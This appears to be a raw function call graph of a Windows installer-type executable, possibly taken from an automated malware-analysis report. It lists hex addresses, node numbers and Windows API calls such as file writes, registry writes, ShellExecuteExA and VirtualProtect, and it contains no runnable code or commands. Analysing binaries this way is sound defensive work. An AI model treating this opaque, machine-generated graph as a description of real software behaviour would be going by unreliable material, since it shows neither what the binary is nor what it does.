5083 4058e7 GetLastError 5081->5083 5082->4953 5083->5082 5085 405901 5084->5085 5086 405905 GetLastError 5084->5086 5085->4953 5086->5085 5088 405965 5087->5088 5089 405959 CloseHandle 5087->5089 5088->4953 5089->5088 5091 401389 2 API calls 5090->5091 5092 401420 5091->5092 5092->4926 5094 405e5a GetTickCount GetTempFileNameA 5093->5094 5095 4033d6 5094->5095 5096 405e87 5094->5096 5095->4902 5096->5094 5096->5095 5097->4980 5098->4982 5099->4986 5101 402ed6 5100->5101 5102 402eee 5100->5102 5103 402ee6 5101->5103 5104 402edf DestroyWindow 5101->5104 5105 402ef6 5102->5105 5106 402efe GetTickCount 5102->5106 5103->4989 5104->5103 5136 4066f1 5105->5136 5107 402f0c CreateDialogParamA ShowWindow 5106->5107 5108 402f2f 5106->5108 5107->5108 5108->4989 5111->4997 5113 40317e 5112->5113 5114 4031ac 5113->5114 5140 403390 SetFilePointer 5113->5140 5116 40337a ReadFile 5114->5116 5117 4031b7 5116->5117 5118 403313 5117->5118 5119 4031c9 GetTickCount 5117->5119 5124 4032fd 5117->5124 5120 403355 5118->5120 5123 403317 5118->5123 5119->5124 5128 403218 5119->5128 5121 40337a ReadFile 5120->5121 5121->5124 5122 40337a ReadFile 5122->5128 5123->5124 5125 40337a ReadFile 5123->5125 5126 405ec7 WriteFile 5123->5126 5124->5003 5125->5123 5126->5123 5127 40326e GetTickCount 5127->5128 5128->5122 5128->5124 5128->5127 5129 403293 MulDiv wsprintfA 5128->5129 5131 405ec7 WriteFile 5128->5131 5130 4053d1 28 API calls 5129->5130 5130->5128 5131->5128 5133 405e98 ReadFile 5132->5133 5134 40338d 5133->5134 5134->5005 5135->4996 5137 40670e PeekMessageA 5136->5137 5138 406704 DispatchMessageA 5137->5138 5139 402efc 5137->5139 5138->5137 5139->4989 5140->5114 5142 403d6f 5141->5142 5151 4061eb wsprintfA 5142->5151 5144 403de0 5152 403e14 5144->5152 5146 403b1b 5146->5019 5147 403de5 5147->5146 5148 406320 21 API calls 5147->5148 5148->5147 5149->5016 5150->5021 5151->5144 5153 406320 21 API calls 5152->5153 5154 403e22 SetWindowTextA 5153->5154 5154->5147 5156 403a0f 5155->5156 5157 403a14 FreeLibrary GlobalFree 5156->5157 5158 4039d9 5156->5158 5157->5157 5157->5158 5158->5070 5159 402758 5160 40275f 5159->5160 5163 402a6c 5159->5163 5161 402c3c 21 API calls 5160->5161 5162 402766 5161->5162 5164 402775 SetFilePointer 5162->5164 5164->5163 5165 402785 5164->5165 5167 4061eb wsprintfA 5165->5167 5167->5163 5576 401e5a GetDC 5577 402c3c 21 API calls 5576->5577 5578 401e6c GetDeviceCaps MulDiv ReleaseDC 5577->5578 5579 402c3c 21 API calls 5578->5579 5580 401e9d 5579->5580 5581 406320 21 API calls 5580->5581 5582 401eda CreateFontIndirectA 5581->5582 5583 40264d 5582->5583 5584 6f7a10e0 5590 6f7a1110 5584->5590 5585 6f7a129a GlobalFree 5586 6f7a11cd GlobalAlloc 5586->5590 5587 6f7a1286 GlobalFree 5587->5590 5588 6f7a133d 2 API calls 5588->5590 5589 6f7a1295 5589->5585 5590->5585 5590->5586 5590->5587 5590->5588 5590->5589 5591 6f7a12f6 2 API calls 5590->5591 5592 6f7a1165 GlobalAlloc 5590->5592 5593 6f7a1361 lstrcpyA 5590->5593 5591->5590 5592->5590 5593->5590 5594 6f7a1661 5600 6f7a154b 5594->5600 5596 6f7a16bf GlobalFree 5597 6f7a1679 5597->5596 5598 6f7a1694 5597->5598 5599 6f7a16ab VirtualFree 5597->5599 5598->5596 5599->5596 5602 6f7a1551 5600->5602 5601 6f7a1557 5601->5597 5602->5601 5603 6f7a1563 GlobalFree 5602->5603 5603->5597 5193 4015e0 5194 402c5e 21 API calls 5193->5194 5195 4015e7 5194->5195 5196 405cb8 4 API calls 5195->5196 5209 4015ef 5196->5209 5197 401649 5199 401677 5197->5199 5200 40164e 5197->5200 5198 405c4a CharNextA 5198->5209 5202 401423 28 API calls 5199->5202 5201 401423 28 API calls 5200->5201 5203 401655 5201->5203 5207 40166f 5202->5207 5212 40628d lstrcpynA 5203->5212 5204 4058f1 2 API calls 5204->5209 5206 401660 SetCurrentDirectoryA 5206->5207 5208 40590e 5 API calls 5208->5209 5209->5197 5209->5198 5209->5204 5209->5208 5210 401631 GetFileAttributesA 5209->5210 5211 405897 2 API calls 5209->5211 5210->5209 5211->5209 5212->5206 5604 4016e0 5605 402c5e 21 API calls 5604->5605 5606 4016e6 GetFullPathNameA 5605->5606 5607 4016fd 5606->5607 5613 40171e 5606->5613 5610 406620 2 API calls 5607->5610 5607->5613 5608 401732 GetShortPathNameA 5609 402aea 5608->5609 5611 40170e 5610->5611 5611->5613 5614 40628d lstrcpynA 5611->5614 5613->5608 5613->5609 5614->5613 5615 6f7a1058 5617 6f7a1074 5615->5617 5616 6f7a10dc 5617->5616 5618 6f7a154b GlobalFree 5617->5618 5619 6f7a1091 5617->5619 5618->5619 5620 6f7a154b GlobalFree 5619->5620 5621 6f7a10a1 5620->5621 5622 6f7a10a8 GlobalSize 5621->5622 5623 6f7a10b1 5621->5623 5622->5623 5624 6f7a10c6 5623->5624 5625 6f7a10b5 GlobalAlloc 5623->5625 5627 6f7a10d1 GlobalFree 5624->5627 5626 6f7a1572 3 API calls 5625->5626 5626->5624 5627->5616 5628 404463 lstrcpynA lstrlenA 5259 405969 ShellExecuteExA 5260 401eea 5261 402c3c 21 API calls 5260->5261 5262 401ef0 5261->5262 5263 402c3c 21 API calls 5262->5263 5264 401efc 5263->5264 5265 401f13 EnableWindow 5264->5265 5266 401f08 ShowWindow 5264->5266 5267 402aea 5265->5267 5266->5267 5268 40176b 5269 402c5e 21 API calls 5268->5269 5270 401772 5269->5270 5271 405e4f 2 API calls 5270->5271 5272 401779 5271->5272 5273 405e4f 2 API calls 5272->5273 5273->5272 5629 40196c 5630 402c5e 21 API calls 5629->5630 5631 401973 lstrlenA 5630->5631 5632 40264d 5631->5632 5633 401ff0 5634 402c5e 21 API calls 5633->5634 5635 401ff7 5634->5635 5636 406620 2 API calls 5635->5636 5637 401ffd 5636->5637 5639 40200f 5637->5639 5640 4061eb wsprintfA 5637->5640 5640->5639 5641 6f7a16c8 5642 6f7a16f7 5641->5642 5643 6f7a1b28 16 API calls 5642->5643 5644 6f7a16fe 5643->5644 5645 6f7a1711 5644->5645 5646 6f7a1705 5644->5646 5648 6f7a171b 5645->5648 5649 6f7a1738 5645->5649 5647 6f7a12f6 2 API calls 5646->5647 5652 6f7a170f 5647->5652 5653 6f7a1572 3 API calls 5648->5653 5650 6f7a173e 5649->5650 5651 6f7a1762 5649->5651 5654 6f7a15e9 3 API calls 5650->5654 5655 6f7a1572 3 API calls 5651->5655 5656 6f7a1720 5653->5656 5657 6f7a1743 5654->5657 5655->5652 5658 6f7a15e9 3 API calls 5656->5658 5660 6f7a12f6 2 API calls 5657->5660 5659 6f7a1726 5658->5659 5661 6f7a12f6 2 API calls 5659->5661 5662 6f7a1749 GlobalFree 5660->5662 5663 6f7a172c GlobalFree 5661->5663 5662->5652 5664 6f7a175d GlobalFree 5662->5664 5663->5652 5664->5652 5665 4014f4 SetForegroundWindow 5666 402aea 5665->5666 5667 404778 5668 404788 5667->5668 5669 4047ae 5667->5669 5670 40432d 22 API calls 5668->5670 5671 404394 8 API calls 5669->5671 5672 404795 SetDlgItemTextA 5670->5672 5673 4047ba 5671->5673 5672->5669 5674 6f7a18c7 5675 6f7a18ea 5674->5675 5676 6f7a191a GlobalFree 5675->5676 5677 6f7a192c 5675->5677 5676->5677 5678 6f7a12f6 2 API calls 5677->5678 5679 6f7a1aae GlobalFree GlobalFree 5678->5679 5385 40177e 5386 402c5e 21 API calls 5385->5386 5387 401785 5386->5387 5388 4017a3 5387->5388 5389 4017ab 5387->5389 5425 40628d lstrcpynA 5388->5425 5426 40628d lstrcpynA 5389->5426 5392 4017a9 5396 406587 5 API calls 5392->5396 5393 4017b6 5394 405c1f 3 API calls 5393->5394 5395 4017bc lstrcatA 5394->5395 5395->5392 5410 4017c8 5396->5410 5397 401809 5399 405dfb 2 API calls 5397->5399 5398 406620 2 API calls 5398->5410 5399->5410 5401 4017df CompareFileTime 5401->5410 5402 4018a3 5403 4053d1 28 API calls 5402->5403 5405 4018ad 5403->5405 5404 4053d1 28 API calls 5414 40188f 5404->5414 5406 403168 35 API calls 5405->5406 5408 4018c0 5406->5408 5407 40628d lstrcpynA 5407->5410 5409 4018d4 SetFileTime 5408->5409 5411 4018e6 FindCloseChangeNotification 5408->5411 5409->5411 5410->5397 5410->5398 5410->5401 5410->5402 5410->5407 5412 406320 21 API calls 5410->5412 5419 4059a3 MessageBoxIndirectA 5410->5419 5422 40187a 5410->5422 5424 405e20 GetFileAttributesA CreateFileA 5410->5424 5413 4018f7 5411->5413 5411->5414 5412->5410 5415 4018fc 5413->5415 5416 40190f 5413->5416 5417 406320 21 API calls 5415->5417 5418 406320 21 API calls 5416->5418 5420 401904 lstrcatA 5417->5420 5421 401917 5418->5421 5419->5410 5420->5421 5421->5414 5423 4059a3 MessageBoxIndirectA 5421->5423 5422->5404 5422->5414 5423->5414 5424->5410 5425->5392 5426->5393 5680 40167e 5681 402c5e 21 API calls 5680->5681 5682 401684 5681->5682 5683 406620 2 API calls 5682->5683 5684 40168a 5683->5684 5685 40197e 5686 402c3c 21 API calls 5685->5686 5687 401985 5686->5687 5688 402c3c 21 API calls 5687->5688 5689 401992 5688->5689 5690 402c5e 21 API calls 5689->5690 5691 4019a9 lstrlenA 5690->5691 5692 4019b9 5691->5692 5693 4019f9 5692->5693 5697 40628d lstrcpynA 5692->5697 5695 4019e9 5695->5693 5696 4019ee lstrlenA 5695->5696 5696->5693 5697->5695 5698 401000 5699 401037 BeginPaint GetClientRect 5698->5699 5700 40100c DefWindowProcA 5698->5700 5702 4010f3 5699->5702 5703 401179 5700->5703 5704 401073 CreateBrushIndirect FillRect DeleteObject 5702->5704 5705 4010fc 5702->5705 5704->5702 5706 401102 CreateFontIndirectA 5705->5706 5707 401167 EndPaint 5705->5707 5706->5707 5708 401112 6 API calls 5706->5708 5707->5703 5708->5707 5709 401502 5710 40152d 5709->5710 5711 401507 5709->5711 5712 402c3c 21 API calls 5711->5712 5712->5710 5713 401a83 5714 402c3c 21 API calls 5713->5714 5715 401a8c 5714->5715 5716 402c3c 21 API calls 5715->5716 5717 401a33 5716->5717 5718 6f7a103d 5721 6f7a101b 5718->5721 5722 6f7a154b GlobalFree 5721->5722 5723 6f7a1020 5722->5723 5724 6f7a1027 GlobalAlloc 5723->5724 5725 6f7a1024 5723->5725 5724->5725 5726 6f7a1572 3 API calls 5725->5726 5727 6f7a103b 5726->5727 5728 401588 5729 402a67 5728->5729 5732 4061eb wsprintfA 5729->5732 5731 402a6c 5732->5731 5733 401b88 5734 402c5e 21 API calls 5733->5734 5735 401b8f 5734->5735 5736 402c3c 21 API calls 5735->5736 5737 401b98 wsprintfA 5736->5737 5738 402aea 5737->5738 5739 401d8a 5740 401d90 5739->5740 5741 401d9d GetDlgItem 5739->5741 5742 402c3c 21 API calls 5740->5742 5743 401d97 5741->5743 5742->5743 5744 401dde GetClientRect LoadImageA SendMessageA 5743->5744 5745 402c5e 21 API calls 5743->5745 5747 401e3f 5744->5747 5749 401e4b 5744->5749 5745->5744 5748 401e44 DeleteObject 5747->5748 5747->5749 5748->5749 4599 6f7a29b1 4600 6f7a2a01 4599->4600 4601 6f7a29c1 VirtualProtect 4599->4601 4601->4600 5750 40278b 5751 402791 5750->5751 5752 402799 FindClose 5751->5752 5753 402aea 5751->5753 5752->5753 4602 40240d 4603 402c5e 21 API calls 4602->4603 4604 40241e 4603->4604 4605 402c5e 21 API calls 4604->4605 4606 402427 4605->4606 4607 402c5e 21 API calls 4606->4607 4608 402431 GetPrivateProfileStringA 4607->4608 4640 40550f 4641 405531 GetDlgItem GetDlgItem GetDlgItem 4640->4641 4642 4056ba 4640->4642 4686 404362 SendMessageA 4641->4686 4644 4056c2 GetDlgItem CreateThread FindCloseChangeNotification 4642->4644 4645 4056ea 4642->4645 4644->4645 4709 4054a3 OleInitialize 4644->4709 4647 405718 4645->4647 4650 405700 ShowWindow ShowWindow 4645->4650 4651 405739 4645->4651 4646 4055a1 4656 4055a8 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4646->4656 4648 405720 4647->4648 4649 405773 4647->4649 4653 405728 4648->4653 4654 40574c ShowWindow 4648->4654 4649->4651 4663 405780 SendMessageA 4649->4663 4691 404362 SendMessageA 4650->4691 4695 404394 4651->4695 4692 404306 4653->4692 4659 40576c 4654->4659 4660 40575e 4654->4660 4661 405616 4656->4661 4662 4055fa SendMessageA SendMessageA 4656->4662 4658 405745 4668 404306 SendMessageA 4659->4668 4667 4053d1 28 API calls 4660->4667 4664 405629 4661->4664 4665 40561b SendMessageA 4661->4665 4662->4661 4663->4658 4666 405799 CreatePopupMenu 4663->4666 4687 40432d 4664->4687 4665->4664 4669 406320 21 API calls 4666->4669 4667->4659 4668->4649 4671 4057a9 AppendMenuA 4669->4671 4673 4057c7 GetWindowRect 4671->4673 4674 4057da TrackPopupMenu 4671->4674 4672 405639 4675 405642 ShowWindow 4672->4675 4676 405676 GetDlgItem SendMessageA 4672->4676 4673->4674 4674->4658 4677 4057f6 4674->4677 4678 405665 4675->4678 4679 405658 ShowWindow 4675->4679 4676->4658 4680 40569d SendMessageA SendMessageA 4676->4680 4681 405815 SendMessageA 4677->4681 4690 404362 SendMessageA 4678->4690 4679->4678 4680->4658 4681->4681 4682 405832 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4681->4682 4684 405854 SendMessageA 4682->4684 4684->4684 4685 405876 GlobalUnlock SetClipboardData CloseClipboard 4684->4685 4685->4658 4686->4646 4688 406320 21 API calls 4687->4688 4689 404338 SetDlgItemTextA 4688->4689 4689->4672 4690->4676 4691->4647 4693 404313 SendMessageA 4692->4693 4694 40430d 4692->4694 4693->4651 4694->4693 4696 404457 4695->4696 4697 4043ac GetWindowLongA 4695->4697 4696->4658 4697->4696 4698 4043c1 4697->4698 4698->4696 4699 4043f1 4698->4699 4700 4043ee GetSysColor 4698->4700 4701 404401 SetBkMode 4699->4701 4702 4043f7 SetTextColor 4699->4702 4700->4699 4703 404419 GetSysColor 4701->4703 4704 40441f 4701->4704 4702->4701 4703->4704 4705 404430 4704->4705 4706 404426 SetBkColor 4704->4706 4705->4696 4707 404443 DeleteObject 4705->4707 4708 40444a CreateBrushIndirect 4705->4708 4706->4705 4707->4708 4708->4696 4716 404379 4709->4716 4711 4054c6 4714 4054ed 4711->4714 4719 401389 4711->4719 4712 404379 SendMessageA 4713 4054ff OleUninitialize 4712->4713 4714->4712 4717 404391 4716->4717 4718 404382 SendMessageA 4716->4718 4717->4711 4718->4717 4721 401390 4719->4721 4720 4013fe 4720->4711 4721->4720 4722 4013cb MulDiv SendMessageA 4721->4722 4722->4721 4723 40168f 4724 402c5e 21 API calls 4723->4724 4725 401696 4724->4725 4726 402c5e 21 API calls 4725->4726 4727 40169f 4726->4727 4728 402c5e 21 API calls 4727->4728 4729 4016a8 MoveFileA 4728->4729 4730 4016b4 4729->4730 4731 4016bb 4729->4731 4732 401423 28 API calls 4730->4732 4735 40230f 4731->4735 4737 406620 FindFirstFileA 4731->4737 4732->4735 4738 4016ca 4737->4738 4739 406636 FindClose 4737->4739 4738->4735 4740 406066 MoveFileExA 4738->4740 4739->4738 4741 406087 4740->4741 4742 40607a 4740->4742 4741->4730 4744 405ef6 4742->4744 4745 405f42 GetShortPathNameA 4744->4745 4746 405f1c 4744->4746 4748 406061 4745->4748 4749 405f57 4745->4749 4771 405e20 GetFileAttributesA CreateFileA 4746->4771 4748->4741 4749->4748 4751 405f5f wsprintfA 4749->4751 4750 405f26 CloseHandle GetShortPathNameA 4750->4748 4752 405f3a 4750->4752 4753 406320 21 API calls 4751->4753 4752->4745 4752->4748 4754 405f87 4753->4754 4772 405e20 GetFileAttributesA CreateFileA 4754->4772 4756 405f94 4756->4748 4757 405fa3 GetFileSize GlobalAlloc 4756->4757 4758 405fc5 4757->4758 4759 40605a CloseHandle 4757->4759 4773 405e98 ReadFile 4758->4773 4759->4748 4764 405fe4 lstrcpyA 4767 406006 4764->4767 4765 405ff8 4766 405d85 4 API calls 4765->4766 4766->4767 4768 40603d SetFilePointer 4767->4768 4780 405ec7 WriteFile 4768->4780 4771->4750 4772->4756 4774 405eb6 4773->4774 4774->4759 4775 405d85 lstrlenA 4774->4775 4776 405dc6 lstrlenA 4775->4776 4777 405d9f lstrcmpiA 4776->4777 4778 405dce 4776->4778 4777->4778 4779 405dbd CharNextA 4777->4779 4778->4764 4778->4765 4779->4776 4781 405ee5 GlobalFree 4780->4781 4781->4759 5754 401490 5755 4053d1 28 API calls 5754->5755 5756 401497 5755->5756 5757 404b10 5758 404b20 5757->5758 5759 404b3c 5757->5759 5768 405987 GetDlgItemTextA 5758->5768 5760 404b42 SHGetPathFromIDListA 5759->5760 5761 404b6f 5759->5761 5763 404b59 SendMessageA 5760->5763 5764 404b52 5760->5764 5763->5761 5766 40140b 2 API calls 5764->5766 5765 404b2d SendMessageA 5765->5759 5766->5763 5768->5765 5769 401a12 5770 402c5e 21 API calls 5769->5770 5771 401a19 5770->5771 5772 402c5e 21 API calls 5771->5772 5773 401a22 5772->5773 5774 401a29 lstrcmpiA 5773->5774 5775 401a3b lstrcmpA 5773->5775 5776 401a2f 5774->5776 5775->5776 5777 401594 5778 4015a4 ShowWindow 5777->5778 5779 4015ab 5777->5779 5778->5779 5780 4015b9 ShowWindow 5779->5780 5781 402aea 5779->5781 5780->5781 5168 402318 5169 402c5e 21 API calls 5168->5169 5170 40231e 5169->5170 5171 402c5e 21 API calls 5170->5171 5172 402327 5171->5172 5173 402c5e 21 API calls 5172->5173 5174 402330 5173->5174 5175 406620 2 API calls 5174->5175 5176 402339 5175->5176 5177 40234a lstrlenA lstrlenA 5176->5177 5178 40233d 5176->5178 5180 4053d1 28 API calls 5177->5180 5179 4053d1 28 API calls 5178->5179 5182 402345 5178->5182 5179->5182 5181 402386 SHFileOperationA 5180->5181 5181->5178 5181->5182 5782 404498 5783 4045ba 5782->5783 5784 4044ae 5782->5784 5785 404629 5783->5785 5789 4046f3 5783->5789 5794 4045fe GetDlgItem SendMessageA 5783->5794 5787 40432d 22 API calls 5784->5787 5786 404633 GetDlgItem 5785->5786 5785->5789 5788 404649 5786->5788 5793 4046b1 5786->5793 5790 404504 5787->5790 5788->5793 5797 40466f SendMessageA LoadCursorA SetCursor 5788->5797 5792 404394 8 API calls 5789->5792 5791 40432d 22 API calls 5790->5791 5795 404511 CheckDlgButton 5791->5795 5796 4046ee 5792->5796 5793->5789 5798 4046c3 5793->5798 5815 40434f KiUserCallbackDispatcher 5794->5815 5813 40434f KiUserCallbackDispatcher 5795->5813 5819 40473c 5797->5819 5802 4046c9 SendMessageA 5798->5802 5803 4046da 5798->5803 5802->5803 5803->5796 5807 4046e0 SendMessageA 5803->5807 5804 404624 5816 404718 5804->5816 5805 40452f GetDlgItem 5814 404362 SendMessageA 5805->5814 5807->5796 5810 404545 SendMessageA 5811 404563 GetSysColor 5810->5811 5812 40456c SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5810->5812 5811->5812 5812->5796 5813->5805 5814->5810 5815->5804 5817 404726 5816->5817 5818 40472b SendMessageA 5816->5818 5817->5818 5818->5785 5822 405969 ShellExecuteExA 5819->5822 5821 4046a2 LoadCursorA SetCursor 5821->5793 5822->5821 5823 402198 5824 402c5e 21 API calls 5823->5824 5825 40219f 5824->5825 5826 402c5e 21 API calls 5825->5826 5827 4021a9 5826->5827 5828 402c5e 21 API calls 5827->5828 5829 4021b3 5828->5829 5830 402c5e 21 API calls 5829->5830 5831 4021c0 5830->5831 5832 402c5e 21 API calls 5831->5832 5833 4021ca 5832->5833 5834 40220c CoCreateInstance 5833->5834 5835 402c5e 21 API calls 5833->5835 5838 40222b 5834->5838 5840 4022d9 5834->5840 5835->5834 5836 401423 28 API calls 5837 40230f 5836->5837 5839 4022b9 MultiByteToWideChar 5838->5839 5838->5840 5839->5840 5840->5836 5840->5837 5183 40269a 5184 402c3c 21 API calls 5183->5184 5190 4026a4 5184->5190 5185 402712 5186 405e98 ReadFile 5186->5190 5187 402714 5192 4061eb wsprintfA 5187->5192 5189 402724 5189->5185 5191 40273a SetFilePointer 5189->5191 5190->5185 5190->5186 5190->5187 5190->5189 5191->5185 5192->5185 5841 40239a 5842 4023a1 5841->5842 5845 4023b4 5841->5845 5843 406320 21 API calls 5842->5843 5844 4023ae 5843->5844 5844->5845 5846 4059a3 MessageBoxIndirectA 5844->5846 5846->5845 5847 402a1b 5848 402a22 5847->5848 5849 402a6e 5847->5849 5852 402c3c 21 API calls 5848->5852 5855 402a6c 5848->5855 5850 4066b5 5 API calls 5849->5850 5851 402a75 5850->5851 5853 402c5e 21 API calls 5851->5853 5854 402a30 5852->5854 5856 402a7e 5853->5856 5857 402c3c 21 API calls 5854->5857 5856->5855 5865 4062e0 5856->5865 5859 402a3f 5857->5859 5864 4061eb wsprintfA 5859->5864 5860 402a8c 5860->5855 5869 4062ca 5860->5869 5864->5855 5866 4062eb 5865->5866 5867 40630e IIDFromString 5866->5867 5868 406307 5866->5868 5867->5860 5868->5860 5872 4062af WideCharToMultiByte 5869->5872 5871 402aad CoTaskMemFree 5871->5855 5872->5871 5873 40149d 5874 4023b4 5873->5874 5875 4014ab PostQuitMessage 5873->5875 5875->5874 5876 401f1e 5877 402c5e 21 API calls 5876->5877 5878 401f24 5877->5878 5879 402c5e 21 API calls 5878->5879 5880 401f2d 5879->5880 5881 402c5e 21 API calls 5880->5881 5882 401f36 5881->5882 5883 402c5e 21 API calls 5882->5883 5884 401f3f 5883->5884 5885 401423 28 API calls 5884->5885 5886 401f46 5885->5886 5893 405969 ShellExecuteExA 5886->5893 5888 401f81 5889 40672a 5 API calls 5888->5889 5891 4027ed 5888->5891 5890 401f9b CloseHandle 5889->5890 5890->5891 5893->5888 5213 401fa0 5214 402c5e 21 API calls 5213->5214 5215 401fa6 5214->5215 5216 4053d1 28 API calls 5215->5216 5217 401fb0 5216->5217 5218 405926 2 API calls 5217->5218 5219 401fb6 5218->5219 5221 4027ed 5219->5221 5227 401fd7 CloseHandle 5219->5227 5228 40672a WaitForSingleObject 5219->5228 5223 401fcb 5224 401fd0 5223->5224 5225 401fd9 5223->5225 5233 4061eb wsprintfA 5224->5233 5225->5227 5227->5221 5229 406744 5228->5229 5230 406756 GetExitCodeProcess 5229->5230 5231 4066f1 2 API calls 5229->5231 5230->5223 5232 40674b WaitForSingleObject 5231->5232 5232->5229 5233->5227 5894 402020 5895 402c5e 21 API calls 5894->5895 5896 402027 5895->5896 5897 4066b5 5 API calls 5896->5897 5898 402036 5897->5898 5899 40204e GlobalAlloc 5898->5899 5902 4020be 5898->5902 5900 402062 5899->5900 5899->5902 5901 4066b5 5 API calls 5900->5901 5903 402069 5901->5903 5904 4066b5 5 API calls 5903->5904 5905 402073 5904->5905 5905->5902 5909 4061eb wsprintfA 5905->5909 5907 4020ae 5910 4061eb wsprintfA 5907->5910 5909->5907 5910->5902 5911 401922 5912 401959 5911->5912 5913 402c5e 21 API calls 5912->5913 5914 40195e 5913->5914 5915 405a4f 71 API calls 5914->5915 5916 401967 5915->5916 5234 4024a3 5235 402c5e 21 API calls 5234->5235 5236 4024b5 5235->5236 5237 402c5e 21 API calls 5236->5237 5238 4024bf 5237->5238 5251 402cee 5238->5251 5241 402aea 5242 4024f4 5244 402500 5242->5244 5247 402c3c 21 API calls 5242->5247 5243 402c5e 21 API calls 5246 4024ed lstrlenA 5243->5246 5245 402522 RegSetValueExA 5244->5245 5248 403168 35 API calls 5244->5248 5249 402538 RegCloseKey 5245->5249 5246->5242 5247->5244 5248->5245 5249->5241 5252 402d09 5251->5252 5255 406141 5252->5255 5256 406150 5255->5256 5257 4024cf 5256->5257 5258 40615b RegCreateKeyExA 5256->5258 5257->5241 5257->5242 5257->5243 5258->5257 5917 401d23 5918 402c3c 21 API calls 5917->5918 5919 401d29 IsWindow 5918->5919 5920 401a33 5919->5920 5921 401925 5922 402c5e 21 API calls 5921->5922 5923 40192c 5922->5923 5924 4059a3 MessageBoxIndirectA 5923->5924 5925 401935 5924->5925 5926 4027a5 5927 4027ab 5926->5927 5928 4027af FindNextFileA 5927->5928 5930 4027c1 5927->5930 5929 402800 5928->5929 5928->5930 5932 40628d lstrcpynA 5929->5932 5932->5930 5274 401bac 5275 401bb9 5274->5275 5276 401bfd 5274->5276 5277 401c41 5275->5277 5283 401bd0 5275->5283 5278 401c01 5276->5278 5279 401c26 GlobalAlloc 5276->5279 5281 406320 21 API calls 5277->5281 5288 4023b4 5277->5288 5278->5288 5295 40628d lstrcpynA 5278->5295 5280 406320 21 API calls 5279->5280 5280->5277 5282 4023ae 5281->5282 5282->5288 5289 4059a3 MessageBoxIndirectA 5282->5289 5293 40628d lstrcpynA 5283->5293 5286 401c13 GlobalFree 5286->5288 5287 401bdf 5294 40628d lstrcpynA 5287->5294 5289->5288 5291 401bee 5296 40628d lstrcpynA 5291->5296 5293->5287 5294->5291 5295->5286 5296->5288 5933 4029af 5934 402c3c 21 API calls 5933->5934 5936 4029b5 5934->5936 5935 406320 21 API calls 5937 4027ed 5935->5937 5936->5935 5936->5937 5938 402631 5939 402c5e 21 API calls 5938->5939 5940 402638 5939->5940 5943 405e20 GetFileAttributesA CreateFileA 5940->5943 5942 402644 5943->5942 5944 404d32 GetDlgItem GetDlgItem 5945 404d88 7 API calls 5944->5945 5949 404faf 5944->5949 5946 404e30 DeleteObject 5945->5946 5947 404e24 SendMessageA 5945->5947 5948 404e3b 5946->5948 5947->5946 5950 404e72 5948->5950 5951 406320 21 API calls 5948->5951 5959 405091 5949->5959 5962 404c80 5 API calls 5949->5962 5979 40501e 5949->5979 5952 40432d 22 API calls 5950->5952 5956 404e54 SendMessageA SendMessageA 5951->5956 5957 404e86 5952->5957 5953 40513d 5954 405147 SendMessageA 5953->5954 5955 40514f 5953->5955 5954->5955 5966 405161 ImageList_Destroy 5955->5966 5967 405168 5955->5967 5973 405178 5955->5973 5956->5948 5963 40432d 22 API calls 5957->5963 5958 404fa2 5961 404394 8 API calls 5958->5961 5959->5953 5959->5958 5964 4050ea SendMessageA 5959->5964 5960 405083 SendMessageA 5960->5959 5965 40533e 5961->5965 5962->5979 5976 404e97 5963->5976 5964->5958 5969 4050ff SendMessageA 5964->5969 5966->5967 5971 405171 GlobalFree 5967->5971 5967->5973 5968 4052f2 5968->5958 5974 405304 ShowWindow GetDlgItem ShowWindow 5968->5974 5970 405112 5969->5970 5981 405123 SendMessageA 5970->5981 5971->5973 5972 404f71 GetWindowLongA SetWindowLongA 5975 404f8a 5972->5975 5973->5968 5987 404d00 4 API calls 5973->5987 5991 4051b3 5973->5991 5974->5958 5977 404fa7 5975->5977 5978 404f8f ShowWindow 5975->5978 5976->5972 5980 404ee9 SendMessageA 5976->5980 5982 404f6c 5976->5982 5985 404f27 SendMessageA 5976->5985 5986 404f3b SendMessageA 5976->5986 5997 404362 SendMessageA 5977->5997 5996 404362 SendMessageA 5978->5996 5979->5959 5979->5960 5980->5976 5981->5953 5982->5972 5982->5975 5985->5976 5986->5976 5987->5991 5988 4052bd 5989 4052c8 InvalidateRect 5988->5989 5992 4052d4 5988->5992 5989->5992 5990 4051e1 SendMessageA 5995 4051f7 5990->5995 5991->5990 5991->5995 5992->5968 5998 404c3b 5992->5998 5994 40526b SendMessageA SendMessageA 5994->5995 5995->5988 5995->5994 5996->5958 5997->5949 6001 404b76 5998->6001 6000 404c50 6000->5968 6002 404b8c 6001->6002 6003 406320 21 API calls 6002->6003 6004 404bf0 6003->6004 6005 406320 21 API calls 6004->6005 6006 404bfb 6005->6006 6007 406320 21 API calls 6006->6007 6008 404c11 lstrlenA wsprintfA SetDlgItemTextA 6007->6008 6008->6000 5297 403e33 5298 403e4b 5297->5298 5299 403fac 5297->5299 5298->5299 5301 403e57 5298->5301 5300 403fbd GetDlgItem GetDlgItem 5299->5300 5318 403ffd 5299->5318 5302 40432d 22 API calls 5300->5302 5304 403e62 SetWindowPos 5301->5304 5305 403e75 5301->5305 5306 403fe7 SetClassLongA 5302->5306 5303 404057 5307 404379 SendMessageA 5303->5307 5316 403fa7 5303->5316 5304->5305 5308 403ec0 5305->5308 5309 403e7e ShowWindow 5305->5309 5312 40140b 2 API calls 5306->5312 5339 404069 5307->5339 5313 403ec8 DestroyWindow 5308->5313 5314 403edf 5308->5314 5310 403f99 5309->5310 5311 403e9e GetWindowLongA 5309->5311 5323 404394 8 API calls 5310->5323 5311->5310 5317 403eb7 ShowWindow 5311->5317 5312->5318 5319 4042b6 5313->5319 5320 403ee4 SetWindowLongA 5314->5320 5321 403ef5 5314->5321 5315 401389 2 API calls 5322 40402f 5315->5322 5317->5308 5318->5303 5318->5315 5319->5316 5328 4042e7 ShowWindow 5319->5328 5320->5316 5321->5310 5326 403f01 GetDlgItem 5321->5326 5322->5303 5327 404033 SendMessageA 5322->5327 5323->5316 5324 40140b 2 API calls 5324->5339 5325 4042b8 DestroyWindow EndDialog 5325->5319 5329 403f12 SendMessageA IsWindowEnabled 5326->5329 5330 403f2f 5326->5330 5327->5316 5328->5316 5329->5316 5329->5330 5332 403f3c 5330->5332 5334 403f83 SendMessageA 5330->5334 5335 403f4f 5330->5335 5343 403f34 5330->5343 5331 406320 21 API calls 5331->5339 5332->5334 5332->5343 5333 404306 SendMessageA 5338 403f6a 5333->5338 5334->5310 5336 403f57 5335->5336 5337 403f6c 5335->5337 5340 40140b 2 API calls 5336->5340 5341 40140b 2 API calls 5337->5341 